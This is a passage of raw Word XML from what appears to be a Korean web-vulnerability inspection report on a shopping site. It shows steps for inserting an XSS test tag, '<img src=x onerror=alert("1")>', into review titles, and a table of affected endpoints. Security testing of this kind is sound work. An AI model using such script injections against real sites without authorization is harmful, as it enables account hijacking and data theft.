        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="371" w:name="_Toc206630391"/>
      <w:bookmarkStart w:id="372" w:name="_Toc206630529"/>
      <w:bookmarkStart w:id="373" w:name="_Toc209094604"/>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31</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>상품</w:t>
      </w:r>
      <w:r w:rsidR="00FF4215">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">설명 하단 </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>상품평</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00D30F4D">
        <w:t>WRITE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="371"/>
      <w:bookmarkEnd w:id="372"/>
      <w:bookmarkEnd w:id="373"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645FE64E" w14:textId="77777777" w:rsidR="007C5B08" w:rsidRPr="00D30F4D" w:rsidRDefault="007C5B08" w:rsidP="007C5B08">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E131866" w14:textId="59331A34" w:rsidR="007C5B08" w:rsidRDefault="007C5B08" w:rsidP="007C5B08">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="374" w:name="_Toc206630392"/>
      <w:bookmarkStart w:id="375" w:name="_Toc206630530"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251529216" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="57E33747" wp14:editId="34E0DF26">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2350770</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1617980</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1104900" cy="182880"/>
                <wp:effectExtent l="0" t="0" r="19050" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="603" name="직사각형 603"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1104900" cy="18288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0D935" id="직사각형 603" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:185.1pt;margin-top:127.4pt;width:87pt;height:14.4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SCgAIAAM8EAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdHdDWtKomypqFYRU&#10;tZVa1PPEa2ct+Q/byabcyjsg8QZcOPBcqLwDY++mLYUTogd3xjP+Zuebb3J0vNWKbLgP0pqaVnsl&#10;Jdww20izqun768WrCSUhgmlAWcNressDPZ69fHHUuSkf2daqhnuCICZMO1fTNkY3LYrAWq4h7FnH&#10;DQaF9Roiun5VNB46RNeqGJXlQdFZ3zhvGQ8Bb0/7IJ1lfCE4ixdCBB6Jqil+W8ynz+cyncXsCKYr&#10;D66VbPgM+Iev0CANFn2AOoUIZO3lH1BaMm+DFXGPWV1YISTjuQfspiqfdXPVguO5FyQnuAeawv+D&#10;ZeebS09kU9OD8jUlBjQO6f7r3f2nbz++3/388pmke2Spc2GKyVfu0g9eQDO1vBVep//YDNlmZm8f&#10;mOXbSBheVlU5PixxAAxj1WQ0mWTqi8fXzof4lltNklFTj5PLhMLmLESsiKm7lFTM2IVUKk9PGdIh&#10;6GG5n/ABRSQURDS1w7aCWVECaoXqZNFnyGCVbNLzBBT8anmiPNkAKmSxKPEvtYvlfktLtU8htH1e&#10;DvXa0TKigJXUNZ2kx7vXyiR0niU4dJAo7ElL1tI2t0i9t70mg2MLiUXOIMRL8ChC7AYXK17gIZTF&#10;Fu1gUdJa//Fv9ykftYFRSjoUNbb/YQ2eU6LeGVTNYTUepy3Iznj/zQgd/zSyfBoxa31ikZUKV9ix&#10;bKb8qHam8Fbf4P7NU1UMgWFYuyd6cE5iv2y4wYzP5zkNle8gnpkrxxJ44inRe729Ae+G+UdUzrnd&#10;LQBMn8mgz+2FMF9HK2TWyCOvOMHk4NbkWQ4bntbyqZ+zHn+HZr8AAAD//wMAUEsDBBQABgAIAAAA&#10;IQDfzXDJ3wAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/LTsMwEEX3SPyDNUjsqIObNlGIUwES&#10;QqAuoLR7N3aTqPY4it0k/D3DCpZz5+g+ys3sLBvNEDqPEu4XCTCDtdcdNhL2Xy93ObAQFWplPRoJ&#10;3ybAprq+KlWh/YSfZtzFhpEJhkJJaGPsC85D3RqnwsL3Bul38oNTkc6h4XpQE5k7y0WSrLlTHVJC&#10;q3rz3Jr6vLs4CR/+fOL2IMR79vQqsjeXT824lfL2Zn58ABbNHP9g+K1P1aGiTkd/QR2YlbDMEkGo&#10;BLFKaQMRqzQl5UhKvlwDr0r+f0P1AwAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAGrzBIKA&#10;AgAAzwQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAN/N&#10;cMnfAAAACwEAAA8AAAAAAAAAAAAAAAAA2gQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMA&#10;AADmBQAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:bookmarkEnd w:id="374"/>
      <w:bookmarkEnd w:id="375"/>
      <w:r w:rsidR="00431EB7" w:rsidRPr="00431EB7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00431EB7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="747371BA" wp14:editId="31DD7B77">
            <wp:extent cx="4572000" cy="2347236"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="1524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1792" b="55179"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="23472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9BE7A2" w14:textId="1BA22B10" w:rsidR="007C5B08" w:rsidRDefault="007C5B08" w:rsidP="007C5B08">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="376" w:name="_Toc206630393"/>
      <w:bookmarkStart w:id="377" w:name="_Toc206630531"/>
      <w:bookmarkStart w:id="378" w:name="_Toc209094605"/>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32</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001F5764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">제목에 </w:t>
      </w:r>
      <w:r w:rsidR="009A421E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>점검</w:t>
      </w:r>
      <w:r w:rsidR="001F5764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">용 </w:t>
      </w:r>
      <w:r w:rsidR="001F5764">
        <w:t xml:space="preserve">HTML </w:t>
      </w:r>
      <w:r w:rsidR="000F2E56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">스크립트 </w:t>
      </w:r>
      <w:r w:rsidR="001F5764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>태그 삽입</w:t>
      </w:r>
      <w:bookmarkEnd w:id="376"/>
      <w:bookmarkEnd w:id="377"/>
      <w:bookmarkEnd w:id="378"/>
    </w:p>
    <w:p w14:paraId="7111FEE0" w14:textId="76B741ED" w:rsidR="007C5B08" w:rsidRPr="009A421E" w:rsidRDefault="007C5B08" w:rsidP="007C5B08">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9187"/>
      </w:tblGrid>
      <w:tr w:rsidR="009638C5" w14:paraId="2DCE8E51" w14:textId="77777777" w:rsidTr="00447E2D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9187" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7F6055F5" w14:textId="6A1049E7" w:rsidR="009638C5" w:rsidRDefault="003E2549" w:rsidP="009638C5">
            <w:r>
              <w:t>&lt;img src=x onerror=alert(“1”)&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F69075F" w14:textId="0AB0D278" w:rsidR="009638C5" w:rsidRPr="009638C5" w:rsidRDefault="009638C5" w:rsidP="009638C5">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="379" w:name="_Toc206630394"/>
      <w:bookmarkStart w:id="380" w:name="_Toc206630532"/>
      <w:bookmarkStart w:id="381" w:name="_Toc206631718"/>
      <w:bookmarkStart w:id="382" w:name="_Toc206631767"/>
      <w:bookmarkStart w:id="383" w:name="_Ref206631791"/>
      <w:bookmarkStart w:id="384" w:name="_Ref206631832"/>
      <w:bookmarkStart w:id="385" w:name="_Toc209094674"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[코드</w:t>
      </w:r>
      <w:r>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4</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkStart w:id="386" w:name="_Toc206631854"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">점검용 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTML </w:t>
      </w:r>
      <w:r w:rsidR="005B0431">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">스크립트 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>태</w:t>
      </w:r>
      <w:bookmarkEnd w:id="379"/>
      <w:bookmarkEnd w:id="380"/>
      <w:r w:rsidR="003B3038">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>그</w:t>
      </w:r>
      <w:bookmarkEnd w:id="381"/>
      <w:bookmarkEnd w:id="382"/>
      <w:bookmarkEnd w:id="383"/>
      <w:bookmarkEnd w:id="384"/>
      <w:bookmarkEnd w:id="386"/>
      <w:bookmarkEnd w:id="385"/>
    </w:p>
    <w:p w14:paraId="5A6BCD16" w14:textId="49580EB5" w:rsidR="007C5B08" w:rsidRDefault="007C5B08" w:rsidP="007C5B08">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06136635" w14:textId="77777777" w:rsidR="007C5B08" w:rsidRDefault="007C5B08" w:rsidP="007C5B08">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="387" w:name="_Toc206630398"/>
      <w:bookmarkStart w:id="388" w:name="_Toc206630536"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22CB717A" wp14:editId="18D642B9">
            <wp:extent cx="4571752" cy="1687830"/>
            <wp:effectExtent l="19050" t="19050" r="19685" b="26670"/>
            <wp:docPr id="609" name="그림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7181"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="16879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87"/>
      <w:bookmarkEnd w:id="388"/>
    </w:p>
    <w:p w14:paraId="66DBCAF6" w14:textId="0FF77041" w:rsidR="00CA3FF0" w:rsidRPr="00E81854" w:rsidRDefault="007C5B08" w:rsidP="00E81854">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="389" w:name="_Toc206630399"/>
      <w:bookmarkStart w:id="390" w:name="_Toc206630537"/>
      <w:bookmarkStart w:id="391" w:name="_Toc209094606"/>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33</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="389"/>
      <w:bookmarkEnd w:id="390"/>
      <w:r w:rsidR="00C35E8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">점검용 스크립트 </w:t>
      </w:r>
      <w:r w:rsidR="00E87FA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">태그 </w:t>
      </w:r>
      <w:r w:rsidR="009B1230">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>구동 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="391"/>
    </w:p>
    <w:p w14:paraId="1DEFEAAA" w14:textId="1CBF1D0B" w:rsidR="00B96FB0" w:rsidRDefault="00B96FB0">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B272785" w14:textId="77777777" w:rsidR="00910D06" w:rsidRPr="00CB22A6" w:rsidRDefault="00910D06" w:rsidP="00910D06">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260"/>
        <w:gridCol w:w="4820"/>
      </w:tblGrid>
      <w:tr w:rsidR="00910D06" w:rsidRPr="00B112DB" w14:paraId="14740F23" w14:textId="77777777" w:rsidTr="007E3DFD">
        <w:trPr>
          <w:trHeight w:val="425"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1823D407" w14:textId="77777777" w:rsidR="00910D06" w:rsidRPr="00CB22A6" w:rsidRDefault="00910D06" w:rsidP="005E115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260" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3189BCF0" w14:textId="77777777" w:rsidR="00910D06" w:rsidRPr="00CB22A6" w:rsidRDefault="00910D06"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20" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C2221B7" w14:textId="77777777" w:rsidR="00910D06" w:rsidRPr="00CB22A6" w:rsidRDefault="00910D06"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10D06" w:rsidRPr="00B112DB" w14:paraId="54FCBE12"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43755C89" w14:textId="77777777" w:rsidR="00910D06" w:rsidRPr="00CB22A6" w:rsidRDefault="00910D06"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C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ase 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6BD96A" w14:textId="15DDB57B" w:rsidR="007E3DFD" w:rsidRPr="00CB22A6" w:rsidRDefault="009003E8"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검색창</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2C806704" w14:textId="16A68F2F" w:rsidR="007E3DFD" w:rsidRPr="007E3DFD" w:rsidRDefault="007E3DFD" w:rsidP="007E3DFD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E3DFD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00004341">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>o</w:t>
            </w:r>
            <w:r w:rsidR="00004341">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>penMainSearch.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00431EB7" w:rsidRPr="00B112DB" w14:paraId="3330DC8F"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val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F14AC86" w14:textId="77777777" w:rsidR="00431EB7" w:rsidRPr="00CB22A6" w:rsidRDefault="00431EB7" w:rsidP="00AD1449">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Case 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BA0936" w14:textId="77777777"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hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>상품 상세 페이지</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E6A73F3" w14:textId="050018CA"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t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>상품평</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14EF1622" w14:textId="0ECFC0D7" w:rsidR="00431EB7" w:rsidRPr="00987A57" w:rsidRDefault="00431EB7" w:rsidP="00AD1449">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF0C4D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/shop/open</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Review</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF0C4D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Form.d</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>o</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00431EB7" w:rsidRPr="00B112DB" w14:paraId="09F292F9" w14:textId="77777777" w:rsidTr="004308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48A3B5A" w14:textId="77777777" w:rsidR="00431EB7" w:rsidRPr="00CB22A6"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3F0FD" w14:textId="48017FB3"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hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>상품 상세 페이지</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>상품 문의</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76111F81" w14:textId="5325A583" w:rsidR="00431EB7" w:rsidRPr="00987A57" w:rsidRDefault="00431EB7" w:rsidP="00AD1449">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF0C4D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/shop/openQ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF0C4D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aForm.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00431EB7" w:rsidRPr="00B112DB" w14:paraId="37AE2D4D" w14:textId="77777777" w:rsidTr="00ED2C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25AB5AC2" w14:textId="77777777" w:rsidR="00431EB7" w:rsidRPr="00CB22A6"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C59BB2" w14:textId="1F1980AB"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&gt; QNA</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CF2BF9F" w14:textId="664B6F46" w:rsidR="00431EB7" w:rsidRPr="00EF0C4D" w:rsidRDefault="00431EB7" w:rsidP="00AD1449">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00020359">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>qna</w:t>
            </w:r>
            <w:r w:rsidRPr="00020359">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/openQna</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Write</w:t>
            </w:r>
            <w:r w:rsidRPr="00020359">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00431EB7" w:rsidRPr="00B112DB" w14:paraId="09549484" w14:textId="77777777" w:rsidTr="00A064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5B03D3B" w14:textId="77777777" w:rsidR="00431EB7" w:rsidRPr="00ED2CC8"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F7734B" w14:textId="77777777"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고객센터</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0529F3AD" w14:textId="5D43894F" w:rsidR="00431EB7" w:rsidRPr="00ED2CC8" w:rsidRDefault="00431EB7" w:rsidP="00AD1449">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 공지사항</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3575F569" w14:textId="76F8C4B7" w:rsidR="00431EB7" w:rsidRDefault="00431EB7" w:rsidP="00AD1449">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A0642C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/notice/openNoticeWrite.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00431EB7" w:rsidRPr="00B112DB" w14:paraId="144AE3DE" w14:textId="77777777" w:rsidTr="00E836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1A6E01AD" w14:textId="77777777" w:rsidR="00431EB7" w:rsidRPr="00A0642C"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431202" w14:textId="0D5BD484" w:rsidR="00431EB7" w:rsidRDefault="00431EB7" w:rsidP="00A0642C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
